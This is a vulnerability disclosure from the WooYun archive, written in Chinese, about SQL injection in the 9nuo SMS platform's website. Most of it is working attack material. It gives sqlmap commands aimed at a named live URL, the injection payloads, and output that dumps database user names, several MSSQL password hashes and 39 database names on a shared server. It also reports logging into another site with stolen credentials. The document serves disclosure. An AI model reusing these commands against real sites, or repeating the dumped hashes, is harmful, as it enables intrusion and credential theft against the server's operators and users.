乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-27: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-02-10: 厂商已经主动忽略漏洞,细节向公众公开
九诺短信平台SQL注入,DBA权限,波及同服务器若干网站。
1、注入扫描
./sqlmap.py -u "http://www.9nuo.com/mobile/index.asp?id=48&act=content" --batch --thread 10 --batch --password
2、扫描结果
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=48 AND 5229=5229&act=content Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=48 AND 3510=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(116)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (3510=3510) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(115)+CHAR(112)+CHAR(113)))&act=content Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(101)+CHAR(116)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (2955=2955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(115)+CHAR(112)+CHAR(113))&act=content---[22:25:46] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[22:25:46] [INFO] fetching database users password hashes[22:25:47] [INFO] the SQL query used returns 11 entries[22:25:47] [INFO] starting 10 threads[22:25:47] [INFO] retrieved: gts[22:25:47] [INFO] retrieved: BUILTIN\\\\Administrators[22:25:47] [INFO] retrieved: jicheng_CRM[22:25:47] [INFO] retrieved: huyeage[22:25:47] [INFO] retrieved: sa[22:25:47] [INFO] retrieved: mywebadmin[22:25:47] [INFO] retrieved: 0x0100034dda06e7a09b324958a7d5bf99dbc495755332c8f4fce8d99358dc8334cb42dad3a42823738d80bc0cce46[22:25:47] [INFO] retrieved: 0x01004a782d4059472b9d8629eefef774f1dee9f663d836c47ac5828f9184b46b684fb911b431e380f1b8699c3000[22:25:47] [INFO] retrieved:[22:25:47] [INFO] retrieved: 0x0100de68310f6963817413174dd3186c371639990513de35e11676e225e6e5d43662094ed1c347a8f1858aff8837[22:25:47] [INFO] retrieved: 0x0100ab4c3b19adc9894b4c3666569f0e831af1d9c04e31bc62ce0a94551cc5ac81fd60eaf367608f87db5da37542[22:25:47] [INFO] retrieved: 0x01005b6b740a048c6f2cd98b3f6ca21485ccd88211b7f26d67560a58103e23d417adbea8b9373acc1c6389bcf754[22:25:48] [INFO] retrieved: xinzheng[22:25:48] [INFO] retrieved: 0x0100286c925fc026125e2e0599f56dd94c4cf4656cd146353abd55daa2628e59b3478004858a9f611ec2997d98bb[22:25:50] [INFO] retrieved: gtsUser[22:25:50] [INFO] retrieved: 0x0100f34cec344c2c424a348cd78f2b87a6a5d8ebd8d62eb3313c782eb121e7080a77b2435b980ae89921f8bf735c[22:25:56] [INFO] retrieved: crm_sa[22:25:56] [INFO] retrieved:[22:25:56] [INFO] retrieved: hnhbds[22:25:59] [INFO] retrieved: 0x0100af56365880d981221645175b84b9094524524925cc6b7282f8f46a2ba8e067e22d4a2e670aa339478e170eb3[22:25:59] [INFO] retrieved: 0x01009d6a4407a59f5f5475f4107a230ec0e7689eb79ac1e8d9cbb6ae6b6a3648f7ac51a35f7fbe77570d20fc8631[22:25:59] [INFO] retrieved:
3、检查裤子
./sqlmap.py -u "http://www.9nuo.com/mobile/index.asp?id=48&act=content" --batch --thread 10 --batch --dbs
4、所有裤子
---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=48 AND 5229=5229&act=content Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=48 AND 3510=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(116)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (3510=3510) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(115)+CHAR(112)+CHAR(113)))&act=content Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: id=(SELECT CHAR(113)+CHAR(101)+CHAR(116)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (2955=2955) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(104)+CHAR(115)+CHAR(112)+CHAR(113))&act=content---[22:25:26] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[22:25:26] [INFO] fetching database names[22:25:27] [INFO] the SQL query used returns 39 entries[22:25:27] [INFO] starting 10 threads[22:25:27] [INFO] retrieved: 511080[22:25:27] [INFO] retrieved: 511080_2013[22:25:27] [INFO] retrieved: 9nuo_2014[22:25:27] [INFO] retrieved: 17fashao[22:25:27] [INFO] retrieved: 71ec[22:25:27] [INFO] retrieved: 9nuo_2013[22:25:27] [INFO] retrieved: 17fashao_website[22:25:27] [INFO] retrieved: 9nuowebdb[22:25:27] [INFO] retrieved: ajuju_domains[22:25:27] [INFO] retrieved: ape_center_db[22:25:27] [INFO] retrieved: fashao8[22:25:28] [INFO] retrieved: gts[22:25:28] [INFO] retrieved: Gts_P[22:25:28] [INFO] retrieved: hd_center_db[22:25:28] [INFO] retrieved: hd511080[22:25:28] [INFO] retrieved: hebi[22:25:28] [INFO] retrieved: hdtemp[22:25:28] [INFO] retrieved: huyeage[22:25:28] [INFO] retrieved: jiachen[22:25:28] [INFO] retrieved: ld511080[22:25:28] [INFO] retrieved: model[22:25:29] [INFO] retrieved: msdb[22:25:29] [INFO] retrieved: Northwind[22:25:29] [INFO] retrieved: orderdb[22:25:29] [INFO] retrieved: tempdb[22:25:29] [INFO] retrieved: txsdb[22:25:30] [INFO] retrieved: wiki[22:25:30] [INFO] retrieved: 333eee_mysql2[22:25:30] [INFO] retrieved: 333eee_mysql[22:25:30] [INFO] retrieved: 2012_hnwm_org[22:25:30] [INFO] retrieved: yeage_ng[22:25:30] [INFO] retrieved: zk51_2012[22:25:30] [INFO] retrieved: crm[22:25:31] [INFO] retrieved: kuaijiang_website[22:25:31] [INFO] retrieved: master[22:25:32] [INFO] retrieved: pubs[22:25:33] [INFO] retrieved: xinzheng[22:25:33] [INFO] retrieved: elonzs[22:25:37] [INFO] retrieved: govoaavailable databases [39]:[*] 17fashao[*] 17fashao_website[*] 2012_hnwm_org[*] 333eee_mysql[*] 333eee_mysql2[*] 511080[*] 511080_2013[*] 71ec[*] 9nuo_2013[*] 9nuo_2014[*] 9nuowebdb[*] ajuju_domains[*] ape_center_db[*] crm[*] elonzs[*] fashao8[*] govoa[*] gts[*] Gts_P[*] hd511080[*] hd_center_db[*] hdtemp[*] hebi[*] huyeage[*] jiachen[*] kuaijiang_website[*] ld511080[*] master[*] model[*] msdb[*] Northwind[*] orderdb[*] pubs[*] tempdb[*] txsdb[*] wiki[*] xinzheng[*] yeage_ng[*] zk51_2012
5、检查发现,差不多每个库都对应一个网站....6、乌云搜索9诺发现已爆漏洞: WooYun: 市城市管理局旁站漏洞被沦陷
使用其中17fashao库的用户信息(用户名和密码)登录17fashao.com,成功登录。
推测这些网站后面的开发者(开发公司)都是九诺短信的开发团队。九诺短信赶紧修复此漏洞吧。我在你们那注册的信息也可能被泄漏......
参数过滤...
未能联系到厂商或者厂商积极拒绝